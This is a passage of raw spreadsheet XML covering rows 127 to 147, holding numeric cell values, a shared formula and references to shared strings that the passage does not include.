      <c r="T127" s="8"/>
      <c r="U127" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V127" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W127" s="2" t="s">
        <v>469</v>
      </c>
      <c r="X127" s="6">
        <v>3.0</v>
      </c>
      <c r="Y127" s="6">
        <v>7.0</v>
      </c>
      <c r="Z127" s="6">
        <v>0.0</v>
      </c>
      <c r="AA127" s="8"/>
      <c r="AB127" s="8"/>
      <c r="AC127" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE127" s="8"/>
      <c r="AF127" s="14"/>
    </row>
    <row r="128">
      <c r="A128" s="6">
        <f t="shared" si="1"/>
        <v>0.2215549159</v>
      </c>
      <c r="B128" s="6">
        <v>6.5543305E7</v>
      </c>
      <c r="C128" s="6">
        <v>1.0</v>
      </c>
      <c r="D128" s="7"/>
      <c r="E128" s="8"/>
      <c r="F128" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G128" s="8"/>
      <c r="H128" s="6">
        <v>-1.0</v>
      </c>
      <c r="I128" s="6">
        <v>125.0</v>
      </c>
      <c r="J128" s="17"/>
      <c r="K128" s="17"/>
      <c r="L128" s="17"/>
      <c r="M128" s="17"/>
      <c r="N128" s="17"/>
      <c r="O128" s="4" t="s">
        <v>470</v>
      </c>
      <c r="P128" s="4" t="s">
        <v>471</v>
      </c>
      <c r="Q128" s="6">
        <v>1.0871704E7</v>
      </c>
      <c r="R128" s="7"/>
      <c r="S128" s="7"/>
      <c r="T128" s="7"/>
      <c r="U128" s="8"/>
      <c r="V128" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W128" s="2" t="s">
        <v>472</v>
      </c>
      <c r="X128" s="6">
        <v>2.0</v>
      </c>
      <c r="Y128" s="6">
        <v>1.0</v>
      </c>
      <c r="Z128" s="7"/>
      <c r="AA128" s="7"/>
      <c r="AB128" s="7"/>
      <c r="AC128" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE128" s="8"/>
      <c r="AF128" s="15"/>
    </row>
    <row r="129">
      <c r="A129" s="6">
        <f t="shared" si="1"/>
        <v>0.2713679212</v>
      </c>
      <c r="B129" s="6">
        <v>5.6548494E7</v>
      </c>
      <c r="C129" s="6">
        <v>1.0</v>
      </c>
      <c r="D129" s="8"/>
      <c r="E129" s="8"/>
      <c r="F129" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G129" s="8"/>
      <c r="H129" s="6">
        <v>7.0</v>
      </c>
      <c r="I129" s="6">
        <v>2991.0</v>
      </c>
      <c r="J129" s="20"/>
      <c r="K129" s="20"/>
      <c r="L129" s="20"/>
      <c r="M129" s="20"/>
      <c r="N129" s="20"/>
      <c r="O129" s="4" t="s">
        <v>473</v>
      </c>
      <c r="P129" s="4" t="s">
        <v>474</v>
      </c>
      <c r="Q129" s="6">
        <v>8269482.0</v>
      </c>
      <c r="R129" s="8"/>
      <c r="S129" s="8"/>
      <c r="T129" s="8"/>
      <c r="U129" s="8"/>
      <c r="V129" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W129" s="2" t="s">
        <v>293</v>
      </c>
      <c r="X129" s="6">
        <v>4.0</v>
      </c>
      <c r="Y129" s="6">
        <v>0.0</v>
      </c>
      <c r="Z129" s="8"/>
      <c r="AA129" s="8"/>
      <c r="AB129" s="8"/>
      <c r="AC129" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE129" s="8"/>
      <c r="AF129" s="14"/>
    </row>
    <row r="130">
      <c r="A130" s="6">
        <f t="shared" si="1"/>
        <v>0.06584658604</v>
      </c>
      <c r="B130" s="6">
        <v>3019596.0</v>
      </c>
      <c r="C130" s="6">
        <v>1.0</v>
      </c>
      <c r="D130" s="6">
        <v>3019613.0</v>
      </c>
      <c r="E130" s="8"/>
      <c r="F130" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G130" s="8"/>
      <c r="H130" s="6">
        <v>4.0</v>
      </c>
      <c r="I130" s="6">
        <v>1120.0</v>
      </c>
      <c r="J130" s="20"/>
      <c r="K130" s="20"/>
      <c r="L130" s="20"/>
      <c r="M130" s="20"/>
      <c r="N130" s="20"/>
      <c r="O130" s="4" t="s">
        <v>475</v>
      </c>
      <c r="P130" s="4" t="s">
        <v>476</v>
      </c>
      <c r="Q130" s="6">
        <v>25645.0</v>
      </c>
      <c r="R130" s="8"/>
      <c r="S130" s="8"/>
      <c r="T130" s="8"/>
      <c r="U130" s="8"/>
      <c r="V130" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W130" s="2" t="s">
        <v>299</v>
      </c>
      <c r="X130" s="6">
        <v>4.0</v>
      </c>
      <c r="Y130" s="6">
        <v>0.0</v>
      </c>
      <c r="Z130" s="8"/>
      <c r="AA130" s="8"/>
      <c r="AB130" s="8"/>
      <c r="AC130" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE130" s="8"/>
      <c r="AF130" s="14"/>
    </row>
    <row r="131">
      <c r="A131" s="6">
        <f t="shared" si="1"/>
        <v>0.08895606654</v>
      </c>
      <c r="B131" s="6">
        <v>7.0073634E7</v>
      </c>
      <c r="C131" s="6">
        <v>1.0</v>
      </c>
      <c r="D131" s="8"/>
      <c r="E131" s="8"/>
      <c r="F131" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G131" s="8"/>
      <c r="H131" s="6">
        <v>0.0</v>
      </c>
      <c r="I131" s="6">
        <v>29.0</v>
      </c>
      <c r="J131" s="20"/>
      <c r="K131" s="20"/>
      <c r="L131" s="20"/>
      <c r="M131" s="20"/>
      <c r="N131" s="20"/>
      <c r="O131" s="4" t="s">
        <v>477</v>
      </c>
      <c r="P131" s="4" t="s">
        <v>478</v>
      </c>
      <c r="Q131" s="6">
        <v>1.7483464E7</v>
      </c>
      <c r="R131" s="8"/>
      <c r="S131" s="8"/>
      <c r="T131" s="8"/>
      <c r="U131" s="8"/>
      <c r="V131" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W131" s="2" t="s">
        <v>479</v>
      </c>
      <c r="X131" s="6">
        <v>1.0</v>
      </c>
      <c r="Y131" s="6">
        <v>1.0</v>
      </c>
      <c r="Z131" s="8"/>
      <c r="AA131" s="8"/>
      <c r="AB131" s="8"/>
      <c r="AC131" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE131" s="8"/>
      <c r="AF131" s="14"/>
    </row>
    <row r="132">
      <c r="A132" s="6">
        <f t="shared" si="1"/>
        <v>0.900480272</v>
      </c>
      <c r="B132" s="6">
        <v>1.0788332E7</v>
      </c>
      <c r="C132" s="6">
        <v>1.0</v>
      </c>
      <c r="D132" s="6">
        <v>1.07887E7</v>
      </c>
      <c r="E132" s="8"/>
      <c r="F132" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G132" s="8"/>
      <c r="H132" s="6">
        <v>1.0</v>
      </c>
      <c r="I132" s="6">
        <v>4520.0</v>
      </c>
      <c r="J132" s="17"/>
      <c r="K132" s="17"/>
      <c r="L132" s="17"/>
      <c r="M132" s="17"/>
      <c r="N132" s="17"/>
      <c r="O132" s="4" t="s">
        <v>480</v>
      </c>
      <c r="P132" s="4" t="s">
        <v>481</v>
      </c>
      <c r="Q132" s="6">
        <v>967408.0</v>
      </c>
      <c r="R132" s="7"/>
      <c r="S132" s="7"/>
      <c r="T132" s="7"/>
      <c r="U132" s="8"/>
      <c r="V132" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W132" s="2" t="s">
        <v>482</v>
      </c>
      <c r="X132" s="6">
        <v>1.0</v>
      </c>
      <c r="Y132" s="6">
        <v>0.0</v>
      </c>
      <c r="Z132" s="7"/>
      <c r="AA132" s="7"/>
      <c r="AB132" s="7"/>
      <c r="AC132" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE132" s="8"/>
      <c r="AF132" s="15"/>
    </row>
    <row r="133">
      <c r="A133" s="6">
        <f t="shared" si="1"/>
        <v>0.7704675374</v>
      </c>
      <c r="B133" s="6">
        <v>7.6522548E7</v>
      </c>
      <c r="C133" s="6">
        <v>1.0</v>
      </c>
      <c r="D133" s="7"/>
      <c r="E133" s="8"/>
      <c r="F133" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G133" s="8"/>
      <c r="H133" s="6">
        <v>-1.0</v>
      </c>
      <c r="I133" s="6">
        <v>30.0</v>
      </c>
      <c r="J133" s="17"/>
      <c r="K133" s="17"/>
      <c r="L133" s="17"/>
      <c r="M133" s="17"/>
      <c r="N133" s="17"/>
      <c r="O133" s="4" t="s">
        <v>483</v>
      </c>
      <c r="P133" s="4" t="s">
        <v>484</v>
      </c>
      <c r="Q133" s="6">
        <v>292609.0</v>
      </c>
      <c r="R133" s="7"/>
      <c r="S133" s="7"/>
      <c r="T133" s="7"/>
      <c r="U133" s="8"/>
      <c r="V133" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W133" s="2" t="s">
        <v>485</v>
      </c>
      <c r="X133" s="6">
        <v>1.0</v>
      </c>
      <c r="Y133" s="6">
        <v>1.0</v>
      </c>
      <c r="Z133" s="7"/>
      <c r="AA133" s="7"/>
      <c r="AB133" s="7"/>
      <c r="AC133" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE133" s="8"/>
      <c r="AF133" s="15"/>
    </row>
    <row r="134">
      <c r="A134" s="6">
        <f t="shared" si="1"/>
        <v>0.6578958894</v>
      </c>
      <c r="B134" s="6">
        <v>4.4234677E7</v>
      </c>
      <c r="C134" s="6">
        <v>1.0</v>
      </c>
      <c r="D134" s="8"/>
      <c r="E134" s="8"/>
      <c r="F134" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G134" s="8"/>
      <c r="H134" s="6">
        <v>0.0</v>
      </c>
      <c r="I134" s="6">
        <v>68.0</v>
      </c>
      <c r="J134" s="20"/>
      <c r="K134" s="20"/>
      <c r="L134" s="20"/>
      <c r="M134" s="20"/>
      <c r="N134" s="20"/>
      <c r="O134" s="4" t="s">
        <v>486</v>
      </c>
      <c r="P134" s="4" t="s">
        <v>487</v>
      </c>
      <c r="Q134" s="6">
        <v>1217998.0</v>
      </c>
      <c r="R134" s="8"/>
      <c r="S134" s="8"/>
      <c r="T134" s="8"/>
      <c r="U134" s="8"/>
      <c r="V134" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W134" s="2" t="s">
        <v>488</v>
      </c>
      <c r="X134" s="6">
        <v>0.0</v>
      </c>
      <c r="Y134" s="6">
        <v>2.0</v>
      </c>
      <c r="Z134" s="8"/>
      <c r="AA134" s="8"/>
      <c r="AB134" s="8"/>
      <c r="AC134" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE134" s="8"/>
      <c r="AF134" s="14"/>
    </row>
    <row r="135">
      <c r="A135" s="6">
        <f t="shared" si="1"/>
        <v>0.9619798607</v>
      </c>
      <c r="B135" s="6">
        <v>1.4122801E7</v>
      </c>
      <c r="C135" s="6">
        <v>1.0</v>
      </c>
      <c r="D135" s="8"/>
      <c r="E135" s="8"/>
      <c r="F135" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G135" s="8"/>
      <c r="H135" s="6">
        <v>0.0</v>
      </c>
      <c r="I135" s="6">
        <v>548.0</v>
      </c>
      <c r="J135" s="20"/>
      <c r="K135" s="20"/>
      <c r="L135" s="20"/>
      <c r="M135" s="20"/>
      <c r="N135" s="20"/>
      <c r="O135" s="4" t="s">
        <v>489</v>
      </c>
      <c r="P135" s="4" t="s">
        <v>490</v>
      </c>
      <c r="Q135" s="6">
        <v>1785576.0</v>
      </c>
      <c r="R135" s="8"/>
      <c r="S135" s="8"/>
      <c r="T135" s="8"/>
      <c r="U135" s="8"/>
      <c r="V135" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W135" s="2" t="s">
        <v>491</v>
      </c>
      <c r="X135" s="6">
        <v>0.0</v>
      </c>
      <c r="Y135" s="6">
        <v>3.0</v>
      </c>
      <c r="Z135" s="8"/>
      <c r="AA135" s="8"/>
      <c r="AB135" s="8"/>
      <c r="AC135" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE135" s="8"/>
      <c r="AF135" s="14"/>
    </row>
    <row r="136">
      <c r="A136" s="6">
        <f t="shared" si="1"/>
        <v>0.9742990298</v>
      </c>
      <c r="B136" s="6">
        <v>6.4980705E7</v>
      </c>
      <c r="C136" s="6">
        <v>1.0</v>
      </c>
      <c r="D136" s="8"/>
      <c r="E136" s="8"/>
      <c r="F136" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G136" s="8"/>
      <c r="H136" s="6">
        <v>0.0</v>
      </c>
      <c r="I136" s="6">
        <v>508.0</v>
      </c>
      <c r="J136" s="20"/>
      <c r="K136" s="20"/>
      <c r="L136" s="20"/>
      <c r="M136" s="20"/>
      <c r="N136" s="20"/>
      <c r="O136" s="4" t="s">
        <v>492</v>
      </c>
      <c r="P136" s="4" t="s">
        <v>493</v>
      </c>
      <c r="Q136" s="6">
        <v>3408956.0</v>
      </c>
      <c r="R136" s="8"/>
      <c r="S136" s="6">
        <v>3408956.0</v>
      </c>
      <c r="T136" s="8"/>
      <c r="U136" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V136" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W136" s="2" t="s">
        <v>494</v>
      </c>
      <c r="X136" s="6">
        <v>1.0</v>
      </c>
      <c r="Y136" s="6">
        <v>0.0</v>
      </c>
      <c r="Z136" s="8"/>
      <c r="AA136" s="8"/>
      <c r="AB136" s="8"/>
      <c r="AC136" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE136" s="8"/>
      <c r="AF136" s="14"/>
    </row>
    <row r="137">
      <c r="A137" s="6">
        <f t="shared" si="1"/>
        <v>0.9081654012</v>
      </c>
      <c r="B137" s="6">
        <v>6.9476324E7</v>
      </c>
      <c r="C137" s="6">
        <v>1.0</v>
      </c>
      <c r="D137" s="8"/>
      <c r="E137" s="8"/>
      <c r="F137" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G137" s="8"/>
      <c r="H137" s="6">
        <v>2.0</v>
      </c>
      <c r="I137" s="6">
        <v>196.0</v>
      </c>
      <c r="J137" s="17"/>
      <c r="K137" s="17"/>
      <c r="L137" s="17"/>
      <c r="M137" s="17"/>
      <c r="N137" s="17"/>
      <c r="O137" s="4" t="s">
        <v>495</v>
      </c>
      <c r="P137" s="4" t="s">
        <v>496</v>
      </c>
      <c r="Q137" s="6">
        <v>1235039.0</v>
      </c>
      <c r="R137" s="7"/>
      <c r="S137" s="7"/>
      <c r="T137" s="7"/>
      <c r="U137" s="8"/>
      <c r="V137" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W137" s="2" t="s">
        <v>497</v>
      </c>
      <c r="X137" s="6">
        <v>0.0</v>
      </c>
      <c r="Y137" s="6">
        <v>0.0</v>
      </c>
      <c r="Z137" s="7"/>
      <c r="AA137" s="7"/>
      <c r="AB137" s="7"/>
      <c r="AC137" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE137" s="8"/>
      <c r="AF137" s="15"/>
    </row>
    <row r="138">
      <c r="A138" s="6">
        <f t="shared" si="1"/>
        <v>0.2797481004</v>
      </c>
      <c r="B138" s="6">
        <v>7.4549396E7</v>
      </c>
      <c r="C138" s="6">
        <v>1.0</v>
      </c>
      <c r="D138" s="7"/>
      <c r="E138" s="8"/>
      <c r="F138" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G138" s="8"/>
      <c r="H138" s="6">
        <v>0.0</v>
      </c>
      <c r="I138" s="6">
        <v>29.0</v>
      </c>
      <c r="J138" s="17"/>
      <c r="K138" s="17"/>
      <c r="L138" s="17"/>
      <c r="M138" s="17"/>
      <c r="N138" s="17"/>
      <c r="O138" s="4" t="s">
        <v>498</v>
      </c>
      <c r="P138" s="4" t="s">
        <v>499</v>
      </c>
      <c r="Q138" s="6">
        <v>2.0583436E7</v>
      </c>
      <c r="R138" s="7"/>
      <c r="S138" s="7"/>
      <c r="T138" s="7"/>
      <c r="U138" s="8"/>
      <c r="V138" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W138" s="2" t="s">
        <v>500</v>
      </c>
      <c r="X138" s="6">
        <v>0.0</v>
      </c>
      <c r="Y138" s="6">
        <v>2.0</v>
      </c>
      <c r="Z138" s="7"/>
      <c r="AA138" s="7"/>
      <c r="AB138" s="7"/>
      <c r="AC138" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE138" s="8"/>
      <c r="AF138" s="15"/>
    </row>
    <row r="139">
      <c r="A139" s="6">
        <f t="shared" si="1"/>
        <v>0.4461299855</v>
      </c>
      <c r="B139" s="6">
        <v>7.664633E7</v>
      </c>
      <c r="C139" s="6">
        <v>1.0</v>
      </c>
      <c r="D139" s="7"/>
      <c r="E139" s="8"/>
      <c r="F139" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G139" s="8"/>
      <c r="H139" s="6">
        <v>-3.0</v>
      </c>
      <c r="I139" s="6">
        <v>9.0</v>
      </c>
      <c r="J139" s="17"/>
      <c r="K139" s="17"/>
      <c r="L139" s="17"/>
      <c r="M139" s="17"/>
      <c r="N139" s="17"/>
      <c r="O139" s="4" t="s">
        <v>501</v>
      </c>
      <c r="P139" s="4" t="s">
        <v>502</v>
      </c>
      <c r="Q139" s="6">
        <v>2.2197836E7</v>
      </c>
      <c r="R139" s="7"/>
      <c r="S139" s="7"/>
      <c r="T139" s="7"/>
      <c r="U139" s="8"/>
      <c r="V139" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W139" s="2" t="s">
        <v>503</v>
      </c>
      <c r="X139" s="6">
        <v>0.0</v>
      </c>
      <c r="Y139" s="6">
        <v>0.0</v>
      </c>
      <c r="Z139" s="7"/>
      <c r="AA139" s="7"/>
      <c r="AB139" s="7"/>
      <c r="AC139" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE139" s="8"/>
      <c r="AF139" s="15"/>
    </row>
    <row r="140">
      <c r="A140" s="6">
        <f t="shared" si="1"/>
        <v>0.1493533258</v>
      </c>
      <c r="B140" s="6">
        <v>344719.0</v>
      </c>
      <c r="C140" s="6">
        <v>1.0</v>
      </c>
      <c r="D140" s="6">
        <v>344757.0</v>
      </c>
      <c r="E140" s="8"/>
      <c r="F140" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G140" s="8"/>
      <c r="H140" s="6">
        <v>5.0</v>
      </c>
      <c r="I140" s="6">
        <v>2682.0</v>
      </c>
      <c r="J140" s="17"/>
      <c r="K140" s="17"/>
      <c r="L140" s="17"/>
      <c r="M140" s="17"/>
      <c r="N140" s="17"/>
      <c r="O140" s="4" t="s">
        <v>504</v>
      </c>
      <c r="P140" s="4" t="s">
        <v>505</v>
      </c>
      <c r="Q140" s="6">
        <v>11208.0</v>
      </c>
      <c r="R140" s="2" t="s">
        <v>506</v>
      </c>
      <c r="S140" s="7"/>
      <c r="T140" s="7"/>
      <c r="U140" s="8"/>
      <c r="V140" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W140" s="2" t="s">
        <v>507</v>
      </c>
      <c r="X140" s="6">
        <v>6.0</v>
      </c>
      <c r="Y140" s="6">
        <v>0.0</v>
      </c>
      <c r="Z140" s="6">
        <v>0.0</v>
      </c>
      <c r="AA140" s="7"/>
      <c r="AB140" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AC140" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE140" s="8"/>
      <c r="AF140" s="15"/>
    </row>
    <row r="141">
      <c r="A141" s="6">
        <f t="shared" si="1"/>
        <v>0.9570891475</v>
      </c>
      <c r="B141" s="6">
        <v>6.5570576E7</v>
      </c>
      <c r="C141" s="6">
        <v>1.0</v>
      </c>
      <c r="D141" s="6">
        <v>6.557082E7</v>
      </c>
      <c r="E141" s="8"/>
      <c r="F141" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G141" s="8"/>
      <c r="H141" s="6">
        <v>1.0</v>
      </c>
      <c r="I141" s="6">
        <v>358.0</v>
      </c>
      <c r="J141" s="17"/>
      <c r="K141" s="17"/>
      <c r="L141" s="17"/>
      <c r="M141" s="17"/>
      <c r="N141" s="17"/>
      <c r="O141" s="4" t="s">
        <v>508</v>
      </c>
      <c r="P141" s="4" t="s">
        <v>509</v>
      </c>
      <c r="Q141" s="6">
        <v>1.0893042E7</v>
      </c>
      <c r="R141" s="7"/>
      <c r="S141" s="7"/>
      <c r="T141" s="7"/>
      <c r="U141" s="8"/>
      <c r="V141" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W141" s="2" t="s">
        <v>510</v>
      </c>
      <c r="X141" s="6">
        <v>1.0</v>
      </c>
      <c r="Y141" s="6">
        <v>2.0</v>
      </c>
      <c r="Z141" s="7"/>
      <c r="AA141" s="7"/>
      <c r="AB141" s="7"/>
      <c r="AC141" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE141" s="8"/>
      <c r="AF141" s="15"/>
    </row>
    <row r="142">
      <c r="A142" s="6">
        <f t="shared" si="1"/>
        <v>0.1357384888</v>
      </c>
      <c r="B142" s="6">
        <v>1.9507742E7</v>
      </c>
      <c r="C142" s="6">
        <v>1.0</v>
      </c>
      <c r="D142" s="6">
        <v>1.950792E7</v>
      </c>
      <c r="E142" s="8"/>
      <c r="F142" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G142" s="8"/>
      <c r="H142" s="6">
        <v>13.0</v>
      </c>
      <c r="I142" s="6">
        <v>16117.0</v>
      </c>
      <c r="J142" s="17"/>
      <c r="K142" s="17"/>
      <c r="L142" s="17"/>
      <c r="M142" s="17"/>
      <c r="N142" s="17"/>
      <c r="O142" s="4" t="s">
        <v>511</v>
      </c>
      <c r="P142" s="4" t="s">
        <v>512</v>
      </c>
      <c r="Q142" s="6">
        <v>2905202.0</v>
      </c>
      <c r="R142" s="7"/>
      <c r="S142" s="6">
        <v>680068.0</v>
      </c>
      <c r="T142" s="7"/>
      <c r="U142" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V142" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W142" s="2" t="s">
        <v>513</v>
      </c>
      <c r="X142" s="6">
        <v>1.0</v>
      </c>
      <c r="Y142" s="6">
        <v>1.0</v>
      </c>
      <c r="Z142" s="6">
        <v>0.0</v>
      </c>
      <c r="AA142" s="7"/>
      <c r="AB142" s="7"/>
      <c r="AC142" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE142" s="8"/>
      <c r="AF142" s="15"/>
    </row>
    <row r="143">
      <c r="A143" s="6">
        <f t="shared" si="1"/>
        <v>0.4762512282</v>
      </c>
      <c r="B143" s="6">
        <v>72540.0</v>
      </c>
      <c r="C143" s="6">
        <v>1.0</v>
      </c>
      <c r="D143" s="6">
        <v>74145.0</v>
      </c>
      <c r="E143" s="8"/>
      <c r="F143" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G143" s="8"/>
      <c r="H143" s="6">
        <v>1.0</v>
      </c>
      <c r="I143" s="6">
        <v>547.0</v>
      </c>
      <c r="J143" s="17"/>
      <c r="K143" s="17"/>
      <c r="L143" s="17"/>
      <c r="M143" s="17"/>
      <c r="N143" s="17"/>
      <c r="O143" s="4" t="s">
        <v>514</v>
      </c>
      <c r="P143" s="4" t="s">
        <v>515</v>
      </c>
      <c r="Q143" s="6">
        <v>8223.0</v>
      </c>
      <c r="R143" s="2" t="s">
        <v>516</v>
      </c>
      <c r="S143" s="6">
        <v>8223.0</v>
      </c>
      <c r="T143" s="2" t="s">
        <v>516</v>
      </c>
      <c r="U143" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V143" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W143" s="2" t="s">
        <v>517</v>
      </c>
      <c r="X143" s="6">
        <v>6.0</v>
      </c>
      <c r="Y143" s="6">
        <v>0.0</v>
      </c>
      <c r="Z143" s="6">
        <v>0.0</v>
      </c>
      <c r="AA143" s="7"/>
      <c r="AB143" s="7"/>
      <c r="AC143" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE143" s="8"/>
      <c r="AF143" s="15"/>
    </row>
    <row r="144">
      <c r="A144" s="6">
        <f t="shared" si="1"/>
        <v>0.5664687954</v>
      </c>
      <c r="B144" s="6">
        <v>2.6013E7</v>
      </c>
      <c r="C144" s="6">
        <v>1.0</v>
      </c>
      <c r="D144" s="8"/>
      <c r="E144" s="8"/>
      <c r="F144" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G144" s="8"/>
      <c r="H144" s="6">
        <v>0.0</v>
      </c>
      <c r="I144" s="6">
        <v>1817.0</v>
      </c>
      <c r="J144" s="20"/>
      <c r="K144" s="20"/>
      <c r="L144" s="20"/>
      <c r="M144" s="20"/>
      <c r="N144" s="20"/>
      <c r="O144" s="4" t="s">
        <v>518</v>
      </c>
      <c r="P144" s="4" t="s">
        <v>519</v>
      </c>
      <c r="Q144" s="6">
        <v>3963016.0</v>
      </c>
      <c r="R144" s="8"/>
      <c r="S144" s="8"/>
      <c r="T144" s="8"/>
      <c r="U144" s="8"/>
      <c r="V144" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W144" s="2" t="s">
        <v>520</v>
      </c>
      <c r="X144" s="6">
        <v>1.0</v>
      </c>
      <c r="Y144" s="6">
        <v>0.0</v>
      </c>
      <c r="Z144" s="8"/>
      <c r="AA144" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB144" s="8"/>
      <c r="AC144" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE144" s="8"/>
      <c r="AF144" s="14"/>
    </row>
    <row r="145">
      <c r="A145" s="6">
        <f t="shared" si="1"/>
        <v>0.5316719932</v>
      </c>
      <c r="B145" s="6">
        <v>7.085877E7</v>
      </c>
      <c r="C145" s="6">
        <v>1.0</v>
      </c>
      <c r="D145" s="6">
        <v>7.0861383E7</v>
      </c>
      <c r="E145" s="8"/>
      <c r="F145" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G145" s="8"/>
      <c r="H145" s="6">
        <v>-1.0</v>
      </c>
      <c r="I145" s="6">
        <v>193.0</v>
      </c>
      <c r="J145" s="20"/>
      <c r="K145" s="20"/>
      <c r="L145" s="20"/>
      <c r="M145" s="20"/>
      <c r="N145" s="20"/>
      <c r="O145" s="4" t="s">
        <v>521</v>
      </c>
      <c r="P145" s="4" t="s">
        <v>522</v>
      </c>
      <c r="Q145" s="6">
        <v>1.6504138E7</v>
      </c>
      <c r="R145" s="8"/>
      <c r="S145" s="6">
        <v>4685471.0</v>
      </c>
      <c r="T145" s="8"/>
      <c r="U145" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V145" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W145" s="2" t="s">
        <v>523</v>
      </c>
      <c r="X145" s="6">
        <v>1.0</v>
      </c>
      <c r="Y145" s="6">
        <v>2.0</v>
      </c>
      <c r="Z145" s="8"/>
      <c r="AA145" s="8"/>
      <c r="AB145" s="8"/>
      <c r="AC145" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE145" s="8"/>
      <c r="AF145" s="14"/>
    </row>
    <row r="146">
      <c r="A146" s="6">
        <f t="shared" si="1"/>
        <v>0.8945840941</v>
      </c>
      <c r="B146" s="6">
        <v>2.7824402E7</v>
      </c>
      <c r="C146" s="6">
        <v>1.0</v>
      </c>
      <c r="D146" s="8"/>
      <c r="E146" s="8"/>
      <c r="F146" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G146" s="8"/>
      <c r="H146" s="6">
        <v>0.0</v>
      </c>
      <c r="I146" s="6">
        <v>186.0</v>
      </c>
      <c r="J146" s="20"/>
      <c r="K146" s="20"/>
      <c r="L146" s="20"/>
      <c r="M146" s="20"/>
      <c r="N146" s="20"/>
      <c r="O146" s="4" t="s">
        <v>524</v>
      </c>
      <c r="P146" s="4" t="s">
        <v>525</v>
      </c>
      <c r="Q146" s="6">
        <v>738910.0</v>
      </c>
      <c r="R146" s="8"/>
      <c r="S146" s="8"/>
      <c r="T146" s="8"/>
      <c r="U146" s="8"/>
      <c r="V146" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W146" s="2" t="s">
        <v>526</v>
      </c>
      <c r="X146" s="6">
        <v>1.0</v>
      </c>
      <c r="Y146" s="6">
        <v>0.0</v>
      </c>
      <c r="Z146" s="8"/>
      <c r="AA146" s="8"/>
      <c r="AB146" s="8"/>
      <c r="AC146" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE146" s="8"/>
      <c r="AF146" s="14"/>
    </row>
    <row r="147">
      <c r="A147" s="6">
        <f t="shared" si="1"/>
        <v>0.6020330917</v>
      </c>
      <c r="B147" s="6">
        <v>7.1810492E7</v>
      </c>
      <c r="C147" s="6">
        <v>1.0</v>
      </c>
      <c r="D147" s="8"/>
      <c r="E147" s="8"/>
      <c r="F147" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G147" s="8"/>
      <c r="H147" s="6">
        <v>2.0</v>
      </c>
      <c r="I147" s="6">
        <v>721.0</v>
      </c>
      <c r="J147" s="20"/>
      <c r="K147" s="20"/>
      <c r="L147" s="20"/>
      <c r="M147" s="20"/>
      <c r="N147" s="20"/>
      <c r="O147" s="4" t="s">
        <v>527</v>
      </c>
      <c r="P147" s="4" t="s">
        <v>528</v>
      </c>
      <c r="Q147" s="6">
        <v>1.8213839E7</v>
      </c>
      <c r="R147" s="8"/>
      <c r="S147" s="6">
        <v>4420967.0</v>
      </c>
      <c r="T147" s="8"/>
      <c r="U147" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V147" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W147" s="2" t="s">
        <v>529</v>
      </c>
      <c r="X147" s="6">
        <v>1.0</v>
      </c>
      <c r="Y147" s="6">
        <v>0.0</v>
      </c>
      <c r="Z147" s="8"/>
      <c r="AA147" s="8"/>
      <c r="AB147" s="8"/>
